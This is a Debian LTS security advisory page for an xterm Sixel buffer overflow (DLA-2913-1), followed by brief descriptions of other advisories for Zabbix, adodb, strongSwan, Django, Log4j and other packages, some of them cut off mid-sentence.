Debian LTS: DLA-2913-1: xterm security update
xterm, an X terminal emulator, when Sixel support is enabled, allows attackers to trigger a buffer overflow in set_sixel in graphics_sixel.c via crafted text.
Find the information you need for your favorite open source distribution .
xterm, an X terminal emulator, when Sixel support is enabled, allows attackers to trigger a buffer overflow in set_sixel in graphics_sixel.c via crafted text.
Thomas Chauchefoin from SonarSource discovered that in Zabbix, a server/client network monitoring system, after the initial setup process, some steps of setup.php file are reachable not only by super-administrators, but by unauthenticated users as well. An
It was found that in libphp-adodb, a PHP database abstraction layer library, an attacker can inject values into the PostgreSQL connection string by bypassing adodb_addslashes(). The function can be bypassed in phppgadmin, for example, by surrounding the username in quotes and
Several vulnerabilities have been discovered in apng2gif, a tool for converting APNG images to animated GIF format. Improper sanitization of user input can result in denial of service (application crash) or possible execution of arbitrary code if a malformed image file is processed.
Zhuowei Zhang discovered a bug in the EAP authentication client code of strongSwan, an IKE/IPsec suite, that may allow to bypass the client and in some scenarios even the server authentication, or could lead to a denial-of-service attack.
Several security vulnerabilities have been discovered in librecad, a computer-aided design (CAD) system. Buffer overflows may lead to remote code execution if a specially crafted JWW document is processed.
Two vulnerabilities have been discovered in the Apache HTTP server: CVE-2021-44224
It was discovered that there were two vulnerabilities in Django, a popular Python-based web development framework: - CVE-2022-22818: Possible XSS via {% debug %} template tag.
Multiple security vulnerabilities have been discovered in Apache Log4j 1.2, a Java logging framework, when it is configured to use JMSSink, JDBCAppender, JMSAppender or Apache Chainsaw which could be exploited for remote code execution.